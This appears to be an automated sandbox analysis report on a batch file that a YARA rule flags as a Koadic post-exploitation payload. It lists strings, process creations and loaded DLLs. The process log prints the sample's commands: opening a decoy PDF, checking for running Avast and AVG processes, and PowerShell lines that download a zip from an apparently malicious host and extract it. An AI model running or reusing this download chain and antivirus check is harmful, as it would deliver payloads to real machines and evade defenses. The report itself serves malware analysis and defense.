Source: typeobj.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0634/
Source: 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0657/
Source: 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0670/
Source: 3.11.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0680/
Source: slice.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0683/
Source: 3.8.html.17.dr, 3.11.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://peps.python.org/pep-0706/
Source: 3.1.html.17.dr	String found in binary or memory: https://peps.python.org/pep-3116/
Source: 3.8.html.17.dr	String found in binary or memory: https://peps.python.org/pep-3118/
Source: import.html0.17.dr	String found in binary or memory: https://peps.python.org/pep-3147/
Source: perfmaps.html.17.dr	String found in binary or memory: https://perf.wiki.kernel.org/index.php/Main_Page
Source: reporter.cpython-312.pyc.17.dr, reporter.py.17.dr	String found in binary or memory: https://pip.pypa.io/warnings/backtracking
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://pyhamcrest.readthedocs.io/
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://pyhamcrest.readthedocs.io/en/release-1.8/integration/#module-hamcrest.library.integration.ma
Source: whatnow.html.17.dr, venv.html0.17.dr, 2.5.html.17.dr	String found in binary or memory: https://pypi.org
Source: unittest.mock.html.17.dr	String found in binary or memory: https://pypi.org/project/mock
Source: introduction.html.17.dr	String found in binary or memory: https://pythonnet.github.io/
Source: whatnow.html.17.dr	String found in binary or memory: https://pyvideo.org
Source: 3.1.html.17.dr	String found in binary or memory: https://pyyaml.org/
Source: floatingpoint.html.17.dr	String found in binary or memory: https://scipy.org
Source: unix.html0.17.dr	String found in binary or memory: https://slackbook.org/html/package-management-making-packages.html
Source: core.cpython-312.pyc.17.dr	String found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: interactive.html.17.dr, interpreter.html.17.dr	String found in binary or memory: https://tiswww.case.edu/php/chet/readline/rltop.html
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://tktable.sourceforge.net/tile/doc/converting.txt
Source: tkinter.ttk.html.17.dr	String found in binary or memory: https://tktable.sourceforge.net/tile/tile-tcl2004.pdf
Source: 3.11.html.17.dr	String found in binary or memory: https://toml.io/
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://twisted.org/documents/11.0.0/api/twisted.python.components.html
Source: unittest.mock.html.17.dr	String found in binary or memory: https://web.archive.org/web/20200603181648/http://www.voidspace.org.uk/python/weblog/arch_d7_2010_12
Source: general.html.17.dr	String found in binary or memory: https://wiki.python.org/moin/BeginnersGuide
Source: editors.html.17.dr	String found in binary or memory: https://wiki.python.org/moin/IntegratedDevelopmentEnvironments
Source: general.html.17.dr	String found in binary or memory: https://wiki.python.org/moin/PythonBooks
Source: editors.html.17.dr, general.html.17.dr	String found in binary or memory: https://wiki.python.org/moin/PythonEditors
Source: unittest.mock-examples.html.17.dr	String found in binary or memory: https://williambert.online/2011/07/how-to-unit-testing-in-django-with-mocking-and-patching/
Source: unix.html0.17.dr	String found in binary or memory: https://www.debian.org/doc/manuals/maint-guide/first.en.html
Source: xml.etree.elementtree.html.17.dr	String found in binary or memory: https://www.iana.org/assignments/character-sets/character-sets.xhtml
Source: introduction.html.17.dr	String found in binary or memory: https://www.jython.org/
Source: general.html.17.dr	String found in binary or memory: https://www.list.org
Source: unix.html0.17.dr	String found in binary or memory: https://www.openssl.org/source/openssl-VERSION.tar.gz
Source: introduction.html.17.dr	String found in binary or memory: https://www.pypy.org/
Source: whatnow.html.17.dr, 3.11.html.17.dr	String found in binary or memory: https://www.python.org
Source: 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.dr, genindex-U.html.17.dr, windows.html1.17.dr, venv.html0.17.dr, urllib.robotparser.html.17.dr, objimpl.html.17.dr, contextvars.html.17.dr, zipfile.html.17.dr, warnings.html.17.dr, genindex-_.html.17.dr, bytearray.html.17.dr, exceptions.html.17.dr, float.html.17.dr, genindex-L.html.17.dr, building.html.17.dr, bytes.html.17.dr, appetite.html.17.dr, turtle.html.17.dr, genindex-T.html.17.dr	String found in binary or memory: https://www.python.org/
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/about/success
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/community/lists/
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/community/sigs/current/edu-sig
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/community/workshops/
Source: compatibility_tags.py.17.dr	String found in binary or memory: https://www.python.org/dev/peps/pep-0571/#backwards-compatibility-with-manylinux1-wheels
Source: compatibility_tags.py.17.dr	String found in binary or memory: https://www.python.org/dev/peps/pep-0599/#backwards-compatibility-with-manylinux2010-wheels
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/downloads/
Source: 3.8.html.17.dr	String found in binary or memory: https://www.python.org/downloads/macos/
Source: unix.html0.17.dr	String found in binary or memory: https://www.python.org/downloads/source/
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/psf/
Source: general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.dr, whatnow.html.17.dr, xml.etree.elementtree.html.17.dr, unix.html0.17.dr, toplevel_components.html.17.dr, genindex-S.html.17.dr, introduction.html.17.dr, genindex-Symbols.html.17.dr, 3.1.html.17.dr, tkinter.font.html.17.dr, hash.html.17.dr, import.html0.17.dr, unittest.mock-examples.html.17.dr, floatingpoint.html.17.dr, 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://www.python.org/psf/donations/
Source: general.html.17.dr	String found in binary or memory: https://www.python.org/psf/trademarks/
Source: general.html.17.dr	String found in binary or memory: https://www.redhat.com
Source: general.html.17.dr, interpreter.html.17.dr, tkinter.ttk.html.17.dr, slice.html.17.dr, long.html.17.dr, whatnow.html.17.dr, xml.etree.elementtree.html.17.dr, unix.html0.17.dr, toplevel_components.html.17.dr, genindex-S.html.17.dr, introduction.html.17.dr, genindex-Symbols.html.17.dr, 3.1.html.17.dr, tkinter.font.html.17.dr, hash.html.17.dr, import.html0.17.dr, unittest.mock-examples.html.17.dr, floatingpoint.html.17.dr, 3.11.html.17.dr, copyright.html.17.dr, 3.12.html.17.dr	String found in binary or memory: https://www.sphinx-doc.org/
Source: general.html.17.dr	String found in binary or memory: https://www.zope.dev

System Summary

Malicious sample detected (through community Yara rule)

Source: new.bat, type: SAMPLE

Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: new.bat, type: SAMPLE

Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload

Source: classification engine

Classification label: mal72.spre.winBAT@34/1071@0/2

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 08-30-10-723.log

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
